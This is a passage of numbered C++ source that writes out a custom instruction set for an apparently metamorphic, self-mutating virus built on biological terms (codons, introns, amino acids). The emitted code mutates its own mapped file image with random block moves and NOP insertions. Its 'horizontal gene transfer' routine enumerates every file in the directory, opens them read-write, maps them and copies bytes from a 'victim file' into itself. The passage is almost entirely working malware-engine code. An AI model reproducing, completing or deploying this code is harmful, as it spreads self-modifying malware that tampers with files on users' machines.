1592file << " _JnzUp ; jnz esi" << endl; CreateAnIntron();
1593file << "; loop ANextByteInChain" << endl; CreateAnIntron();
1594
1595file << "; ##### Finished codons exchange" << endl; CreateAnIntron();
1596file << "; ############################################################################" << endl; CreateAnIntron();
1597
1598GetAddress("RandomNumber");
1599
1600file << " _getdata" << endl; CreateAnIntron();
1601file << " _nopdA" << endl; CreateAnIntron();
1602zer0(0);
1603file << " _nopdD" << endl; CreateAnIntron();
1604
1605addnumber("InsertThreshold1");
1606
1607file << " _div" << endl; CreateAnIntron();
1608file << " _nopsD" << endl; CreateAnIntron();
1609
1610file << " _push ; Save Result = (rand() % InsertThreshold1)" << endl; CreateAnIntron();
1611
1612CalcNewRandNumberAndSaveIt();
1613
1614
1615
1616
1617
1618GetAddress("RandomNumber");
1619file << " _getdata" << endl; CreateAnIntron();
1620file << " _nopdA ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1621
1622zer0(0);
1623file << " _nopdD ; mov RegD, 0" << endl; CreateAnIntron();
1624
1625GetAddress("FileSize");
1626file << " _getdata" << endl; CreateAnIntron();
1627file << " _nopdB ; RegB=FileSize" << endl; CreateAnIntron();
1628
1629file << " _div ; div BC1 <- RegD = rand() % FileSize = nBeforeIns" << endl; CreateAnIntron();
1630
1631GetAddress("InsStart");
1632file << " _saveWrtOff" << endl; CreateAnIntron();
1633
1634file << " _nopsD ; BC1=nBeforeIns" << endl; CreateAnIntron();
1635file << " _save ; BC2=nBeforeIns" << endl; CreateAnIntron();
1636
1637file << " _nopsB ; BC1=FileSize" << endl; CreateAnIntron();
1638subsaved(1);
1639file << " _nopdB ; RegB=(FileSize-nBeforeIns)" << endl; CreateAnIntron();
1640
1641GetAddress("MapPointer");
1642file << " _getdata ; BC1=MapPoint" << endl; CreateAnIntron();
1643file << " _addsaved ; BC1=MapPoint + nBeforeIns = InsStart" << endl; CreateAnIntron();
1644
1645file << " _writeDWord ; !!! InsStart=MapPoint + nBeforeIns" << endl; CreateAnIntron();
1646file << " _push" << endl; CreateAnIntron();
1647
1648
1649
1650CalcNewRandNumberAndSaveIt();
1651
1652GetAddress("nBlockSize");
1653file << " _saveWrtOff" << endl; CreateAnIntron();
1654
1655GetAddress("RandomNumber");
1656file << " _getdata" << endl; CreateAnIntron();
1657file << " _nopdA ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1658
1659zer0(0);
1660file << " _nopdD ; mov RegD, 0" << endl; CreateAnIntron();
1661addnumber("32");
1662
1663file << " _div ; div BC1 <- RegD = rand() % 32 = nBlockSize" << endl; CreateAnIntron();
1664
1665
1666
1667file << " _nopsD ; BC1=nBlockSize" << endl; CreateAnIntron();
1668addnumber("1");
1669file << " _writeDWord ; !!! nBlockSize" << endl; CreateAnIntron();
1670
1671file << " _save ; BC2=nBlockSize" << endl; CreateAnIntron();
1672
1673GetAddress("InsEnd");
1674file << " _saveWrtOff" << endl; CreateAnIntron();
1675
1676file << " _pop ; BC1 = InsStart" << endl; CreateAnIntron();
1677file << " _addsaved ; BC1 = InsStart + nBlockSize = InsEnd" << endl; CreateAnIntron();
1678
1679file << " _writeDWord ; !!! InsEnd" << endl; CreateAnIntron();
1680
1681
1682
1683CalcNewRandNumberAndSaveIt();
1684
1685GetAddress("nByteBlockToMov");
1686file << " _saveWrtOff" << endl; CreateAnIntron();
1687
1688GetAddress("RandomNumber");
1689file << " _getdata" << endl; CreateAnIntron();
1690file << " _nopdA ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1691
1692zer0(0);
1693file << " _nopdD ; mov RegD, 0" << endl; CreateAnIntron();
1694
1695file << " _nopsB ; BC1=(FileSize-nBeforeIns)" << endl; CreateAnIntron();
1696
1697file << " _div" << endl; CreateAnIntron();
1698
1699file << " _nopsD ; BC1=nByteBlockToMov" << endl; CreateAnIntron();
1700addnumber("1");
1701file << " _writeDWord ; !!! nByteBlockToMov" << endl; CreateAnIntron();
1702
1703GetAddress("InsStart");
1704file << " _getdata" << endl; CreateAnIntron();
1705file << " _nopdA ; RegA=InsStart" << endl; CreateAnIntron();
1706
1707GetAddress("InsEnd");
1708file << " _getdata" << endl; CreateAnIntron();
1709file << " _nopdB ; RegB=InsEnd" << endl; CreateAnIntron();
1710
1711GetAddress("nByteBlockToMov");
1712file << " _getdata" << endl; CreateAnIntron();
1713file << " _nopdD ; RegD=nByteBlockToMov=c" << endl; CreateAnIntron();
1714
1715file << "; do" << endl; CreateAnIntron();
1716file << " _getEIP" << endl; CreateAnIntron();
1717file << " _sub0001" << endl; CreateAnIntron();
1718file << " _sub0001" << endl; CreateAnIntron();
1719file << " _sub0001" << endl; CreateAnIntron();
1720file << " _sub0001" << endl; CreateAnIntron();
1721file << " _sub0001" << endl; CreateAnIntron();
1722file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
1723
1724file << " _nopsD ; BC1=c" << endl; CreateAnIntron();
1725file << " _save ; BC2=c" << endl; CreateAnIntron();
1726
1727file << " _nopsB ; BC1=InsEnd" << endl; CreateAnIntron();
1728file << " _addsaved ; BC1=InsEnd+c" << endl; CreateAnIntron();
1729file << " _saveWrtOff ; BA1=InsEnd+c" << endl; CreateAnIntron();
1730
1731
1732file << " _pop ; If BC1=0: mutate" << endl; CreateAnIntron();
1733file << " _push" << endl; CreateAnIntron();
1734addnumber("1");
1735file << " _sub0001 ; Get the zer0 flag" << endl; CreateAnIntron();
1736file << " _JnzDown" << endl;
1737file << " _nopsA ; BC1=InsStart" << endl;
1738file << " _addsaved ; BC1=InsStart+c" << endl;
1739file << " _getdata ; BC1=*(InsStart+c)" << endl;
1740file << " _writeByte ; *(InsEnd+c)==*(InsStart+c)" << endl;
1741
1742file << " _nopsD" << endl; CreateAnIntron();
1743file << " _sub0001" << endl; CreateAnIntron();
1744file << " _nopdD ; RegD=c-1" << endl; CreateAnIntron();
1745
1746file << " _JnzUp" << endl; CreateAnIntron();
1747file << "; while --c" << endl; CreateAnIntron();
1748
1749file << "; Already set:" << endl; CreateAnIntron();
1750GetAddress("InsStart");
1751file << "; _getdata" << endl; CreateAnIntron();
1752file << "; _nopdA ; RegA=InsStart" << endl; CreateAnIntron();
1753
1754zer0(0);
1755addnumber("144");
1756file << " _nopdB" << endl; CreateAnIntron();
1757
1758GetAddress("nBlockSize");
1759file << " _getdata" << endl; CreateAnIntron();
1760file << " _nopdD ; RegD=nBlockSize=c" << endl; CreateAnIntron();
1761
1762
1763file << "; do" << endl; CreateAnIntron();
1764file << " _getEIP" << endl; CreateAnIntron();
1765file << " _sub0001" << endl; CreateAnIntron();
1766file << " _sub0001" << endl; CreateAnIntron();
1767file << " _sub0001" << endl; CreateAnIntron();
1768file << " _sub0001" << endl; CreateAnIntron();
1769file << " _sub0001" << endl; CreateAnIntron();
1770file << " _saveJmpOff ; mov BA2, eip" << endl; CreateAnIntron();
1771
1772file << " _nopsD ; BC1=c" << endl; CreateAnIntron();
1773file << " _save ; BC2=c" << endl; CreateAnIntron();
1774
1775file << " _nopsA ; BC1=InsStart" << endl; CreateAnIntron();
1776file << " _addsaved ; BC1=InsStart+c" << endl; CreateAnIntron();
1777file << " _saveWrtOff ; BA1=InsStart+c" << endl; CreateAnIntron();
1778
1779
1780
1781file << " _pop ; If BC1=0: mutate" << endl; CreateAnIntron();
1782file << " _push" << endl; CreateAnIntron();
1783addnumber("1");
1784file << " _sub0001 ; Get the zer0 flag" << endl; CreateAnIntron();
1785file << " _JnzDown" << endl;
1786file << " _nopREAL" << endl;
1787file << " _nopREAL" << endl;
1788file << " _nopsB" << endl;
1789file << " _writeByte ; *(InsStart+c)==_nopREAL" << endl;
1790
1791file << " _nopsD" << endl; CreateAnIntron();
1792file << " _sub0001" << endl; CreateAnIntron();
1793file << " _nopdD ; RegD=c-1" << endl; CreateAnIntron();
1794
1795file << " _JnzUp" << endl; CreateAnIntron();
1796file << "; while --c" << endl; CreateAnIntron();
1797
1798file << " _pop ; remove (rand() % InsertThreshold1) from Stack" << endl; CreateAnIntron();
1799
1800
1801
1802zer0(0);
1803addnumber("((HGTEnd1-HGTStart1)*8)");
1804
1805file << " _save" << endl; CreateAnIntron();
1806
1807
1808file << " _getEIP" << endl; CreateAnIntron();
1809
1810file << " HGTStart1:" << endl; CreateAnIntron();
1811addnumber("3");
1812file << " _addsaved" << endl; CreateAnIntron();
1813file << " _nopdB ; Save Addresse in RegB" << endl; CreateAnIntron();
1814
1815
1816CalcNewRandNumberAndSaveIt();
1817
1818GetAddress("RandomNumber");
1819file << " _getdata" << endl; CreateAnIntron();
1820file << " _nopdA ; mov RegA, [RandomNumber]" << endl; CreateAnIntron();
1821
1822zer0(0);
1823file << " _nopdD ; mov RegD, 0" << endl; CreateAnIntron();
1824addnumber("HGTThreshold1");
1825
1826file << " _div ; div BC1 <- RegD = rand() % HGTThreshold1" << endl; CreateAnIntron();
1827
1828file << " _nopsD" << endl; CreateAnIntron();
1829file << " _save" << endl; CreateAnIntron();
1830file << " _and ; Is zero?" << endl; CreateAnIntron();
1831
1832file << " _JnzDown ; Simulate a JzDown" << endl;
1833
1834file << " _nopREAL ; BC1=0" << endl;
1835file << " _nopREAL" << endl;
1836file << " _add0001" << endl;
1837file << " _JnzDown" << endl;
1838
1839
1840file << " _nopsB ; BC1!=0" << endl;
1841file << " _call ; jmp over HGT" << endl;
1842file << " _nopREAL" << endl;
1843file << " _nopREAL" << endl;
1844
1845
1846GetAddress("HGT_searchmask");
1847file << " _saveWrtOff" << endl; CreateAnIntron();
1848zer0(0);
1849addnumber("0x002A2E2A");
1850file << " _writeDWord" << endl; CreateAnIntron();
1851
1852
1853GetAddress("WIN32_FIND_DATA_struct");
1854file << " _push" << endl; CreateAnIntron();
1855GetAddress("HGT_searchmask");
1856file << " _push" << endl; CreateAnIntron();
1857CallAPI("hFindFirstFileA");
1858
1859
1860GetAddress("HGT_FFHandle");
1861file << " _saveWrtOff" << endl; CreateAnIntron();
1862file << " _nopsA" << endl; CreateAnIntron();
1863file << " _writeDWord ; Save FindHandle" << endl; CreateAnIntron();
1864
1865file << " _getEIP" << endl; CreateAnIntron();
1866file << " _sub0001" << endl; CreateAnIntron();
1867file << " _sub0001" << endl; CreateAnIntron();
1868file << " _sub0001" << endl; CreateAnIntron();
1869file << " _sub0001" << endl; CreateAnIntron();
1870file << " _sub0001" << endl; CreateAnIntron();
1871file << " _saveJmpOff ; Start of the loop" << endl; CreateAnIntron();
1872
1873
1874file << " ; Calculate the call addresse if the file is not ok" << endl; CreateAnIntron();
1875zer0(0);
1876addnumber("((HGTFileEnd1-HGTFileStart1)*8)");
1877file << " _save" << endl; CreateAnIntron();
1878
1879file << " _getEIP" << endl; CreateAnIntron();
1880
1881file << " HGTFileStart1:" << endl; CreateAnIntron();
1882addnumber("3");
1883file << " _addsaved" << endl; CreateAnIntron();
1884file << " _push ; Save Addresse on Stack" << endl; CreateAnIntron();
1885
1886GetAddress("HGTFileHandle");
1887file << " ; be Closed later in any case," << endl; CreateAnIntron();
1888file << " ; except for [Handle]==0x0" << endl; CreateAnIntron();
1889file << " _saveWrtOff" << endl; CreateAnIntron();
1890zer0(0);
1891file << " _writeDWord" << endl; CreateAnIntron();
1892
1893GetAddress("HGTMapHandle");
1894file << " _saveWrtOff" << endl; CreateAnIntron();
1895zer0(0);
1896file << " _writeDWord" << endl; CreateAnIntron();
1897
1898GetAddress("HGTDidInsert");
1899file << " _saveWrtOff" << endl; CreateAnIntron();
1900zer0(0);
1901file << " _sub0001" << endl; CreateAnIntron();
1902file << " _writeDWord" << endl; CreateAnIntron();
1903
1904zer0(0);
1905addnumber("FILE_ATTRIBUTE_DIRECTORY");
1906file << " _save" << endl; CreateAnIntron();
1907GetAddress("WIN32_FIND_DATA_dwFileAttributes");
1908file << " _getdata" << endl; CreateAnIntron();
1909subsaved(0);
1910
1911file << " _JnzDown ; Simulate a JzDown" << endl;
1912file << " _pop ; BC1=0" << endl;
1913file << " _push" << endl;
1914file << " _call ; If directory -> Do not open..." << endl;
1915file << " _nopREAL" << endl;
1916
1917
1918CalcNewRandNumberAndSaveIt();
1919
1920GetAddress("RandomNumber");
1921file << " _getdata" << endl; CreateAnIntron();
1922file << " _nopdA" << endl; CreateAnIntron();
1923
1924zer0(0);
1925file << " _nopdD" << endl; CreateAnIntron();
1926
1927addnumber("5");
1928file << " _div" << endl; CreateAnIntron();
1929
1930file << " _nopsD" << endl; CreateAnIntron();
1931file << " _save" << endl; CreateAnIntron();
1932file << " _and" << endl; CreateAnIntron();
1933
1934file << " _JnzDown ; Simulate a JzDown" << endl;
1935
1936file << " _nopREAL ; BC=0" << endl;
1937file << " _nopREAL" << endl;
1938file << " _add0001" << endl;
1939file << " _JnzDown" << endl;
1940
1941file << " _pop ; BC!=0" << endl;
1942file << " _push" << endl;
1943file << " _call ; Not this file..." << endl;
1944file << " _nopREAL" << endl;
1945
1946
1947file << " ; OPEN FILE NOW" << endl; CreateAnIntron();
1948zer0(0);
1949file << " _push" << endl; CreateAnIntron();
1950file << " _push" << endl; CreateAnIntron();
1951addnumber("3");
1952file << " _push" << endl; CreateAnIntron();
1953zer0(0);
1954file << " _push" << endl; CreateAnIntron();
1955addnumber("1");
1956file << " _push" << endl; CreateAnIntron();
1957file << " _sub0001" << endl; CreateAnIntron();
1958addnumber("0xC0000000");
1959file << " _push" << endl; CreateAnIntron();
1960GetAddress("WIN32_FIND_DATA_cFileName");
1961file << " _push" << endl; CreateAnIntron();
1962CallAPI("hCreateFileA");
1963
1964GetAddress("HGTFileHandle");
1965file << " _saveWrtOff" << endl; CreateAnIntron();
1966file << " _nopsA" << endl; CreateAnIntron();
1967file << " _writeDWord ; mov dword[HGTFileHandle], RegA" << endl; CreateAnIntron();
1968
1969file << " _save" << endl; CreateAnIntron();
1970
1971file << " _nopsA" << endl; CreateAnIntron();
1972addnumber("1");
1973file << " ; -> if error: BC1=0" << endl; CreateAnIntron();
1974
1975file << " _JnzDown ; Simulate a JzDown" << endl;
1976file << " _pop ; BC1=0" << endl;
1977file << " _push" << endl;
1978file << " _call ; If INVALID_HANDLE_VALUE -> Do not open..." << endl;
1979file << " _nopREAL" << endl;
1980
1981GetAddress("HGTFileSize");
1982
1983file << " _push" << endl; CreateAnIntron();
1984zer0(1);
1985file << " _addsaved" << endl; CreateAnIntron();
1986file << " _push" << endl; CreateAnIntron();
1987CallAPI("hGetFileSize");
1988
1989GetAddress("HGTFileSize");
1990file << " _saveWrtOff" << endl; CreateAnIntron();
1991file << " _nopsA" << endl; CreateAnIntron();
1992file << " _writeDWord ; mov dword[HGTFileSize], RegA" << endl; CreateAnIntron();
1993
1994zer0(1);
1995file << " _push" << endl; CreateAnIntron();
1996file << " _addsaved" << endl; CreateAnIntron();
1997file << " _push" << endl; CreateAnIntron();
1998zer0(0);
1999file << " _push" << endl; CreateAnIntron();
2000addnumber("4");
2001file << " _push" << endl; CreateAnIntron();
2002zer0(0);
2003file << " _push" << endl; CreateAnIntron();
2004GetAddress("HGTFileHandle");
2005file << " _getdata" << endl; CreateAnIntron();
2006file << " _push" << endl; CreateAnIntron();
2007CallAPI("hCreateFileMappingA");
2008
2009
2010GetAddress("HGTMapHandle");
2011
2012file << " _saveWrtOff" << endl; CreateAnIntron();
2013file << " _nopsA" << endl; CreateAnIntron();
2014file << " _writeDWord ; mov dword[HGTMapHandle], RegA" << endl; CreateAnIntron();
2015
2016file << " _save" << endl; CreateAnIntron();
2017
2018file << " _nopsA" << endl; CreateAnIntron();
2019file << " _save" << endl; CreateAnIntron();
2020file << " _and" << endl; CreateAnIntron();
2021file << " _JnzDown ; Simulate a JzDown" << endl;
2022
2023file << " _pop ; BC1=0" << endl;
2024file << " _push" << endl;
2025file << " _call ; If NULL -> Do not open..." << endl;
2026file << " _nopREAL" << endl;
2027
2028GetAddress("HGTFileSize");
2029
2030file << " _getdata" << endl; CreateAnIntron();
2031file << " _push ; [HGTFileSize]" << endl; CreateAnIntron();
2032zer0(1);
2033file << " _push ; 0" << endl; CreateAnIntron();
2034file << " _push ; 0" << endl; CreateAnIntron();
2035addnumber("2");
2036file << " _push" << endl; CreateAnIntron();
2037zer0(1);
2038file << " _addsaved" << endl; CreateAnIntron();
2039file << " _push ; MapHandle" << endl; CreateAnIntron();
2040
2041CallAPI("hMapViewOfFile");
2042
2043GetAddress("HGTMapPointer");
2044
2045file << " _saveWrtOff" << endl; CreateAnIntron();
2046file << " _nopsA" << endl; CreateAnIntron();
2047file << " _writeDWord ; mov dword[HGTMapPointer], RegA" << endl; CreateAnIntron();
2048
2049file << " _nopsA" << endl; CreateAnIntron();
2050file << " _save" << endl; CreateAnIntron();
2051file << " _and" << endl; CreateAnIntron();
2052file << " _JnzDown ; Simulate a JzDown" << endl;
2053file << " _pop ; BC1=0" << endl;
2054file << " _push" << endl;
2055file << " _call ; If NULL -> Do not open..." << endl;
2056file << " _nopREAL" << endl;
2057
2058
2059CalcNewRandNumberAndSaveIt();
2060
2061GetAddress("RandomNumber");
2062file << " _getdata" << endl; CreateAnIntron();
2063file << " _nopdA" << endl; CreateAnIntron();
2064
2065zer0(0);
2066file << " _nopdD" << endl; CreateAnIntron();
2067
2068GetAddress("HGTFileSize");
2069file << " _getdata" << endl; CreateAnIntron();
2070
2071file << " _div" << endl; CreateAnIntron();
2072
2073file << " _nopsD" << endl; CreateAnIntron();
2074file << " _save" << endl; CreateAnIntron();
2075
2076GetAddress("HGTMapPointer");
2077file << " _getdata" << endl; CreateAnIntron();
2078
2079file << " _addsaved" << endl; CreateAnIntron();
2080
2081file << " _push ; Start in sourcefile" << endl; CreateAnIntron();
2082
2083
2084CalcNewRandNumberAndSaveIt();
2085
2086GetAddress("RandomNumber");
2087file << " _getdata" << endl; CreateAnIntron();
2088file << " _nopdA" << endl; CreateAnIntron();
2089
2090zer0(0);
2091file << " _nopdD" << endl; CreateAnIntron();
2092
2093GetAddress("FileSize");
2094file << " _getdata" << endl; CreateAnIntron();
2095
2096file << " _div" << endl; CreateAnIntron();
2097
2098file << " _nopsD" << endl; CreateAnIntron();
2099file << " _save" << endl; CreateAnIntron();
2100
2101GetAddress("MapPointer");
2102file << " _getdata" << endl; CreateAnIntron();
2103file << " _addsaved" << endl; CreateAnIntron();
2104
2105file << " _push ; Start in my file" << endl; CreateAnIntron();
2106
2107
2108CalcNewRandNumberAndSaveIt();
2109
2110GetAddress("RandomNumber");
2111file << " _getdata" << endl; CreateAnIntron();
2112file << " _nopdA" << endl; CreateAnIntron();
2113
2114zer0(0);
2115file << " _nopdD" << endl; CreateAnIntron();
2116
2117addnumber("11");
2118
2119file << " _div" << endl; CreateAnIntron();
2120file << " _nopsD" << endl; CreateAnIntron();
2121addnumber("1");
2122file << " _nopdD" << endl; CreateAnIntron();
2123
2124file << " ; Size in RegD" << endl; CreateAnIntron();
2125
2126
2127file << " _pop ; Start in my file" << endl; CreateAnIntron();
2128file << " _nopdB" << endl; CreateAnIntron();
2129
2130
2131file << " _pop ; Start in victim file" << endl; CreateAnIntron();
2132file << " _nopdA" << endl; CreateAnIntron();
2133
2134file << " _pushall" << endl; CreateAnIntron();
2135file << " _getEIP" << endl; CreateAnIntron();
2136file << " _sub0001" << endl; CreateAnIntron();
2137file << " _sub0001" << endl; CreateAnIntron();
2138file << " _sub0001" << endl; CreateAnIntron();
2139file << " _sub0001" << endl; CreateAnIntron();
2140file << " _sub0001" << endl; CreateAnIntron();
2141
2142file << " _saveJmpOff ; Save everything, especially the old BA2" << endl; CreateAnIntron();
2143
2144file << " _nopsB" << endl; CreateAnIntron();
2145file << " _saveWrtOff" << endl; CreateAnIntron();
2146addnumber("1");
2147file << " _nopdB" << endl; CreateAnIntron();
2148
2149file << " _nopsA" << endl; CreateAnIntron();
2150addnumber("1");
2151file << " _nopdA" << endl; CreateAnIntron();
2152file << " _sub0001" << endl; CreateAnIntron();
2153file << " _getdata" << endl; CreateAnIntron();
2154
2155file << " _writeByte" << endl; CreateAnIntron();
2156
2157file << " _nopsD" << endl; CreateAnIntron();
2158file << " _sub0001" << endl; CreateAnIntron();
2159file << " _nopdD" << endl; CreateAnIntron();
2160
2161file << " _JnzUp" << endl; CreateAnIntron();
2162file << " _popall ; Get old BA2 again" << endl; CreateAnIntron();
2163
2164GetAddress("HGTDidInsert");
2165file << " _saveWrtOff" << endl; CreateAnIntron();
2166zer0(0);
2167file << " _writeDWord" << endl; CreateAnIntron();
2168
2169
2170file << " _push ; trash" << endl; CreateAnIntron();
2171
2172file << " HGTFileEnd1:" << endl; CreateAnIntron();
2173file << " _pop ; from call" << endl; CreateAnIntron();
2174file << " _pop ; saved address" << endl; CreateAnIntron();
2175
2176GetAddress("HGTMapPointer");
2177file << " _getdata" << endl; CreateAnIntron();
2178file << " _push" << endl; CreateAnIntron();
2179CallAPI("hUnmapViewOfFile");
2180
2181
2182file << " _getDO" << endl; CreateAnIntron();
2183addnumber("(hCloseHandle-DataOffset)");
2184file << " _getdata" << endl; CreateAnIntron();
2185file << " _nopdA ; Save API in RegA" << endl; CreateAnIntron();
2186
2187GetAddress("HGTMapHandle");
2188file << " _getdata" << endl; CreateAnIntron();
2189file << " _push" << endl; CreateAnIntron();
2190file << " _save" << endl; CreateAnIntron();
2191file << " _and" << endl; CreateAnIntron();
2192
2193file << " _JnzDown" << endl;
2194file << " ; BC==0" << endl;
2195file << " _nopREAL" << endl;
2196file << " _nopREAL" << endl;
2197file << " _add0001" << endl;
2198file << " _JnzDown" << endl;
2199
2200file << " ; BC!=0" << endl;
2201file << " _nopsA ; get API offset" << endl;
2202file << " _call ; call CloseHandle, dword[HGTMapHandle]" << endl;
2203file << " _push ; Trash" << endl;
2204file << " _nopREAL" << endl;
2205
2206
2207file << " _pop ; remove trash" << endl; CreateAnIntron();
2208
2209file << " _getDO" << endl; CreateAnIntron();
2210addnumber("(hCloseHandle-DataOffset)");
2211file << " _getdata" << endl; CreateAnIntron();
2212file << " _nopdA ; Save API in RegA" << endl; CreateAnIntron();
2213
2214GetAddress("HGTFileHandle");
2215file << " _getdata" << endl; CreateAnIntron();
2216file << " _push" << endl; CreateAnIntron();
2217file << " _save" << endl; CreateAnIntron();
2218file << " _and" << endl; CreateAnIntron();
2219
2220file << " _JnzDown" << endl;
2221file << " ; BC==0" << endl;
2222file << " _nopREAL" << endl;
2223file << " _nopREAL" << endl;
2224file << " _add0001" << endl;
2225file << " _JnzDown" << endl;
2226
2227file << " ; BC!=0" << endl;
2228file << " _nopsA ; get API offset" << endl;
2229file << " _call ; call CloseHandle, dword[HGTFileHandle]" << endl;
2230file << " _push ; Trash" << endl;
2231file << " _nopREAL" << endl;
2232
2233file << " _pop ; remove trash" << endl; CreateAnIntron();
2234
2235
2236GetAddress("HGTDidInsert");
2237file << " _getdata" << endl; CreateAnIntron();
2238file << " _push ; 0...written / -1...not written" << endl; CreateAnIntron();
2239
2240GetAddress("WIN32_FIND_DATA_struct");
2241file << " _push" << endl; CreateAnIntron();
2242GetAddress("HGT_FFHandle");
2243file << " _getdata" << endl; CreateAnIntron();
2244file << " _push" << endl; CreateAnIntron();
2245
2246CallAPI("hFindNextFileA");
2247
2248
2249file << " _pop ; HGTDidInsert" << endl; CreateAnIntron();
2250file << " _save" << endl; CreateAnIntron();
2251file << " _nopsA ; If nonzero: Next file!" << endl; CreateAnIntron();
2252file << " _and" << endl; CreateAnIntron();
2253file << " _JnzUp ; End of the loop" << endl; CreateAnIntron();
2254
2255
2256file << " _push ; Trash to stack" << endl; CreateAnIntron();
2257file << " HGTEnd1:" << endl; CreateAnIntron();
2258
2259file << " _pop ; Align stack (Trash or Return address from _call)" << endl; CreateAnIntron();
2260
2261
2262
2263CalcNewRandNumberAndSaveIt();
2264
2265GetAddress("RPAminoAcid1");
2266file << " _saveWrtOff" << endl; CreateAnIntron();
2267
2268GetAddress("RandomNumber");
2269
2270file << " _getdata" << endl; CreateAnIntron();
2271file << " _nopdA ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
2272
2273
2274zer0(0);
2275file << " _nopdD ; mov edx, 0" << endl; CreateAnIntron();
2276
2277addnumber("256");
2278
2279file << " _div ; div ebx" << endl; CreateAnIntron();
2280
2281file << " _nopsD ; BC1=rand%256" << endl; CreateAnIntron();
2282
2283file << " _writeDWord ; Save amino acid to compare." << endl; CreateAnIntron();
2284
2285
2286file << " _push" << endl; CreateAnIntron();
2287zer0(0);
2288addnumber("3");
2289file << " _save" << endl; CreateAnIntron();
2290
2291file << " _pop" << endl; CreateAnIntron();
2292file << " _shl ; BC1=(rand%256)*8" << endl; CreateAnIntron();
2293file << " _save" << endl; CreateAnIntron();
2294
2295
2296GetAddress("MapPointer");
2297file << " _getdata" << endl; CreateAnIntron();
2298file << " _addsaved ; MapPoint+(rand%256)*8" << endl; CreateAnIntron();
2299
2300addnumber("(CodeStart+(StartAlphabeth-start))");
2301file << " _push" << endl; CreateAnIntron();
2302file << " _getdata" << endl; CreateAnIntron();
2303file << " _nopdA ; First 4 bytes of amino acid in RegA" << endl; CreateAnIntron();
2304
2305file << " _pop" << endl; CreateAnIntron();
2306addnumber("4");
2307file << " _getdata" << endl; CreateAnIntron();
2308file << " _nopdB ; 2nd 4 bytes of amino acid in RegB" << endl; CreateAnIntron();
2309
2310GetAddress("MapPointer");
2311file << " _getdata" << endl; CreateAnIntron();
2312
2313addnumber("(CodeStart+(StartAlphabeth-start))");
2314file << " _nopdD" << endl; CreateAnIntron();
2315
2316
2317file << " ; Start of loop:" << endl; CreateAnIntron();
2318file << " _getEIP" << endl; CreateAnIntron();
2319file << " _sub0001" << endl; CreateAnIntron();
2320file << " _sub0001" << endl; CreateAnIntron();
2321file << " _sub0001" << endl; CreateAnIntron();
2322file << " _sub0001" << endl; CreateAnIntron();
2323file << " _sub0001" << endl; CreateAnIntron();
2324file << " _saveJmpOff" << endl; CreateAnIntron();
2325
2326zer0(0);
2327addnumber("((RPBlock1End1-RPBlock1Start1)*8)");
2328file << " _save" << endl; CreateAnIntron();
2329
2330file << " _getEIP" << endl; CreateAnIntron();
2331
2332file << " RPBlock1Start1:" << endl; CreateAnIntron();
2333addnumber("3");
2334file << " _addsaved" << endl; CreateAnIntron();
2335file << " _push ; Save Addresse at Stack" << endl; CreateAnIntron();
2336
2337
2338file << " _pushall" << endl; CreateAnIntron();
2339CalcNewRandNumberAndSaveIt();
2340
2341GetAddress("RPAminoAcid2");
2342file << " _saveWrtOff" << endl; CreateAnIntron();
2343
2344GetAddress("RandomNumber");
2345
2346file << " _getdata" << endl; CreateAnIntron();
2347file << " _nopdA ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
2348
2349zer0(0);
2350file << " _nopdD ; mov edx, 0" << endl; CreateAnIntron();
2351
2352addnumber("256");
2353
2354file << " _div ; div ebx" << endl; CreateAnIntron();
2355
2356file << " _nopsD" << endl; CreateAnIntron();
2357file << " _writeDWord" << endl; CreateAnIntron();
2358
2359file << " _popall" << endl; CreateAnIntron();
2360
2361file << " _pushall" << endl; CreateAnIntron();
2362GetAddress("RPAminoAcid1");
2363file << " _getdata" << endl; CreateAnIntron();
2364file << " _nopdA" << endl; CreateAnIntron();
2365GetAddress("RPAminoAcid2");
2366file << " _getdata" << endl; CreateAnIntron();
2367file << " _nopdB" << endl; CreateAnIntron();
2368
2369file << " _popall" << endl; CreateAnIntron();
2370
2371zer0(0);
2372addnumber("3");
2373file << " _save" << endl; CreateAnIntron();
2374
2375GetAddress("RPAminoAcid2");
2376file << " _getdata" << endl; CreateAnIntron();
2377
2378file << " _shl ; *8" << endl; CreateAnIntron();
2379file << " _save" << endl; CreateAnIntron();
2380
2381file << " _nopsD ; Get start of Alphabeth in Map" << endl; CreateAnIntron();
2382
2383file << " _addsaved" << endl; CreateAnIntron();
2384
2385file << " _getdata" << endl; CreateAnIntron();
2386file << " _save" << endl; CreateAnIntron();
2387
2388file << " _nopsA" << endl; CreateAnIntron();
2389subsaved(0);
2390
2391file << " _JnzDown ; Simulate JzDown" << endl;
2392
2393file << " _nopREAL ; BC1=0" << endl;
2394file << " _nopREAL" << endl;
2395file << " _add0001" << endl;
2396file << " _JnzDown" << endl;
2397
2398file << " _nopREAL ; Not equal" << endl;
2399file << " _pop" << endl;
2400file << " _push" << endl;
2401file << " _call ; jmp to RPBlock1End" << endl;
2402
2403file << " ; First 4 bytes are equal" << endl; CreateAnIntron();
2404file << " _pop ; Old Call-address" << endl; CreateAnIntron();
2405
2406zer0(0);
2407addnumber("((RPBlock2End1-RPBlock2Start1)*8)");
2408file << " _save" << endl; CreateAnIntron();
2409
2410file << " _getEIP" << endl; CreateAnIntron();
2411
2412file << " RPBlock2Start1:" << endl; CreateAnIntron();
2413addnumber("3");
2414file << " _addsaved" << endl; CreateAnIntron();
2415file << " _push ; Save Addresse at Stack" << endl; CreateAnIntron();
2416
2417
2418zer0(0);
2419addnumber("3");
2420file << " _save" << endl; CreateAnIntron();
2421
2422GetAddress("RPAminoAcid2");
2423file << " _getdata" << endl; CreateAnIntron();
2424
2425file << " _shl ; *8" << endl; CreateAnIntron();
2426file << " _save" << endl; CreateAnIntron();
2427
2428file << " _nopsD ; Get start of Alphabeth in Map" << endl; CreateAnIntron();
2429
2430file << " _addsaved" << endl; CreateAnIntron();
2431
2432addnumber("4");
2433
2434file << " _getdata" << endl; CreateAnIntron();
2435file << " _save" << endl; CreateAnIntron();
2436
2437file << " _nopsB ; second 4 bytes" << endl; CreateAnIntron();
2438subsaved(0);
2439file << " _JnzDown" << endl;
2440
2441file << " _nopREAL ; BC1=0" << endl;
2442file << " _pop" << endl;
2443file << " _push" << endl;
2444file << " _call ; RPBlock2End" << endl;
2445
2446file << " _push ; not equal! trash to stack" << endl; CreateAnIntron();
2447
